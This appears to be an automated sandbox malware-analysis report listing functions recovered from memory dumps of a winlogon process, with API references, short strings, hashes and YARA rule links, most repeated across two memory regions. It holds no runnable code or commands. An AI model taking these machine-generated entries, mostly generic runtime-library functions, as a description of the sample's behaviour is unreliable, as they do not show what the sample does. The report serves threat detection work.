Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 7cc56dc5878abcd6a96181a4b2024c97ccb0eaf9ae46be06cfffd60e81ecf245
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: C551C6323516828BEB54CF27E44CB6C77A1F358B98F16412ADA4A4779ADB79C8C1CF10

Function 000002E991788CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002E991788CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 000002E991788D62
RtlUnwindEx.NTDLL ref: 000002E991788DBC

Strings

csm, xrefs: 000002E991788D49

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 1f63982a18062e9f0935fceb1145b5e81ded89a10b4697858e9dea8d64b7cbc5
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: B551EA32351A828AFB54CF17E48CB6C7792F358B98F16415BDA4A4778AD778C8C1CB20

Function 000002E991729EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002E991729ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000002E991729FBC

Strings

csm, xrefs: 000002E99172A00E
csm, xrefs: 000002E991729EF6

Memory Dump Source

Source File: 00000029.00000003.2213692370.000002E991720000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_3_2e991720000_winlogon.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 5245f6954dfabc6742d6d348b4d87dc19f51a601044c91f07984bcb02d770560
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: F451AF322867C28AEB748F13D14876877A0F355B94F1A491BDA8947BD6DB38C4D2CF11

Function 000002E99175A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000002E99175A75B
_CallSETranslator.LIBVCRUNTIME ref: 000002E99175A7A7

Strings

MOC, xrefs: 000002E99175A76F
RCC, xrefs: 000002E99175A777

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 3bc2d67f80104992992477e7340d9035f78e25e83d3d511ca87db9c2dc8273e3
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: D561BF36508BC585EB318F16E44439ABBA0F785B98F05422AEBD817B9ADB7CC1D0CF10

Function 000002E99175AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002E99175AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000002E99175ABBC

Strings

csm, xrefs: 000002E99175AAF6
csm, xrefs: 000002E99175AC0E

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: e685092e90978d0501a2dad0ed369dd6b5fb9e804fbfe8bf10a372145ce3a3b0
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: BB5169322807C68BEB748B23D54836877A1F754B94F16412BDA9947BD6CB39C8D0CF61

Function 000002E99178A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000002E99178A75B
_CallSETranslator.LIBVCRUNTIME ref: 000002E99178A7A7

Strings

RCC, xrefs: 000002E99178A777
MOC, xrefs: 000002E99178A76F

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 34e65dc3e1b812b9fbea43c75af0b7d457c5e3b746a7eceb7c11c9f4cf0731f4
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 4C61CE32508BC581EB719F16E48439AB7A0F784B98F05421BEB9813B9ADB3CC1D0CF10

Function 000002E99178AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002E99178AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000002E99178ABBC

Strings

csm, xrefs: 000002E99178AAF6
csm, xrefs: 000002E99178AC0E

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: fedb2b7326cfa88f624bc591b2eb8ac8a397b2253b847836ce97bccaf3ecacb7
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: B4514A322847C28BFB748F23D5883587BA1F394B94F16419BDA9947B96CB38C491CF21

Function 000002E991753950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 000002E991753972
StrStrW.SHLWAPI ref: 000002E991753990
StrToIntW.SHLWAPI ref: 000002E9917539B7

Part of subcall function 000002E991751A30: OpenProcess.KERNEL32 ref: 000002E991751A56
Part of subcall function 000002E991751A30: K32GetModuleFileNameExW.KERNEL32 ref: 000002E991751A74
Part of subcall function 000002E991751A30: PathFindFileNameW.SHLWAPI ref: 000002E991751A83
Part of subcall function 000002E991751A30: lstrlenW.KERNEL32 ref: 000002E991751A8F
Part of subcall function 000002E991751A30: StrCpyW.SHLWAPI ref: 000002E991751AA2
Part of subcall function 000002E991751A30: CloseHandle.KERNEL32 ref: 000002E991751AB0

Part of subcall function 000002E991753F88: StrCmpNIW.SHLWAPI(?,?,?,000002E99175272F), ref: 000002E991753FA0

Strings

pid_, xrefs: 000002E991753968

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: c4a06dece46056ab7789d1c3daff1342b5858c2528e36e34403515c746dcdc1c
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 7D1151213547C391FB109B37E80935A62A4F748784F96442BAE59C36A6EF79C985CB30

Function 000002E991783950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 000002E991783972
StrStrW.SHLWAPI ref: 000002E991783990
StrToIntW.SHLWAPI ref: 000002E9917839B7

Part of subcall function 000002E991781A30: OpenProcess.KERNEL32 ref: 000002E991781A56
Part of subcall function 000002E991781A30: K32GetModuleFileNameExW.KERNEL32 ref: 000002E991781A74
Part of subcall function 000002E991781A30: PathFindFileNameW.SHLWAPI ref: 000002E991781A83
Part of subcall function 000002E991781A30: lstrlenW.KERNEL32 ref: 000002E991781A8F
Part of subcall function 000002E991781A30: StrCpyW.SHLWAPI ref: 000002E991781AA2
Part of subcall function 000002E991781A30: CloseHandle.KERNEL32 ref: 000002E991781AB0

Part of subcall function 000002E991783F88: StrCmpNIW.SHLWAPI(?,?,?,000002E99178272F), ref: 000002E991783FA0

Strings

pid_, xrefs: 000002E991783968

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: f59c48bcdb5ee82874b622a1c9d690f7a9c3128cb9a259ca3b6a1111052294fb
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 2A1187113547C391FB109B3BE89935A93A4F744740F82406BAE4D83696EF68C989CB30

Function 000002E991761FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000002E991762027
WriteFile.KERNEL32 ref: 000002E991762304
WriteFile.KERNEL32 ref: 000002E99176234A
GetLastError.KERNEL32 ref: 000002E991762409

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: 0543faa1264bf5e933782931de0b7ed961c74ad66f662df87aebe23a03844e65
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: 6CD10E32714A8189E751CFA6D4482EC3BB1F354BD8F42421BCE5DA7B9ADB34C486CB61

Function 000002E991791FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000002E991792027
WriteFile.KERNEL32 ref: 000002E991792304
WriteFile.KERNEL32 ref: 000002E99179234A
GetLastError.KERNEL32 ref: 000002E991792409

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: bccf53d073770c37c1661c7f5c3e2d82a1482f2af4b708a313350c1b991c6b10
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: D0D10032754A8189E710CFAAD4483EC37B1F354B99F52421BCE5D97B9ADA34C48ACB50

Function 000002E9917514A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002E9917514C6
HeapFree.KERNEL32 ref: 000002E9917514D5
GetProcessHeap.KERNEL32 ref: 000002E9917514E2
HeapFree.KERNEL32 ref: 000002E9917514F1
GetProcessHeap.KERNEL32 ref: 000002E991751501

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 1dfc726098b2fda98d48260f526c6bb5e29f6a1ffb86288764379f9376010b8c
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: F4012532651BD1DAE718DF67E8082497BA1F788FC0B0A402ADF4A93729DF38D491CB51

Function 000002E9917814A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002E9917814C6
HeapFree.KERNEL32 ref: 000002E9917814D5
GetProcessHeap.KERNEL32 ref: 000002E9917814E2
HeapFree.KERNEL32 ref: 000002E9917814F1
GetProcessHeap.KERNEL32 ref: 000002E991781501

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 18eab9cddb7b91f531fc7089bd83bc6e872a8bce6adce5ba8f2f7c64dfbbfc01
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: E8015372690AA1DAE714DF67E80824977A1F788F81B0A402BDB4E43729DE38D095CB50

Function 000002E9917628F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002E9917628DF), ref: 000002E991762A12

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: 539dea508a0051cf67cdf58a0cdba42cff0e924aa4d181097de0980c18d7c7af
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: BC91C43275069285FBA48F67D4583AD3BA0F354BC8F45410FDE4AA7A96DB34C4C5CB22

Function 000002E9917928F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002E9917928DF), ref: 000002E991792A12

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: efa4c21779cdabfdb155cba61af19c1655200ca76d9d5a99903c9194edf711c9
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: 3691F4327506D289FB68EF67D4583AD2BA0F344B99F45410FDE0E63696DA34C4C9CB20

Function 000002E991758090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000002E9917580BC
GetCurrentThreadId.KERNEL32 ref: 000002E9917580CA
GetCurrentProcessId.KERNEL32 ref: 000002E9917580D6
QueryPerformanceCounter.KERNEL32 ref: 000002E9917580E6

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: 9e5b0eb4c216b82bd63a9301d21dfbd72028371af2b39313a8c65cb2279ec029
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: DC115E26750F458AEF00CF62E8583A833A4F7197A8F450E2AEA6D867A5DF78C194C750

Function 000002E991788090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000002E9917880BC
GetCurrentThreadId.KERNEL32 ref: 000002E9917880CA
GetCurrentProcessId.KERNEL32 ref: 000002E9917880D6
QueryPerformanceCounter.KERNEL32 ref: 000002E9917880E6

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: 3ce6b5edabb619c2e02180abcadb217e0bc353f0c2f73a1621b79aa341b0b663
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 5A11A136790F418AEB00CF71E8583A933A4F318758F450E2AEE2D837A5DF38C1988750

Function 000002E9917527E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002E9917528CC
StrCpyW.SHLWAPI ref: 000002E9917528E5

Part of subcall function 000002E991753F88: StrCmpNIW.SHLWAPI(?,?,?,000002E99175272F), ref: 000002E991753FA0

Strings

\\.\pipe\, xrefs: 000002E9917528D7

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 733c0bc99f424a881941c56df01b6d703df8890a3328c50a6ad7bd930ffac944
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: 4671C532284BC382E7759E27D8483AA67A4F395BC4F52001FDD4A57B9ADF34C680CB20

Function 000002E9917827E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002E9917828CC
StrCpyW.SHLWAPI ref: 000002E9917828E5

Part of subcall function 000002E991783F88: StrCmpNIW.SHLWAPI(?,?,?,000002E99178272F), ref: 000002E991783FA0

Strings

\\.\pipe\, xrefs: 000002E9917828D7

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
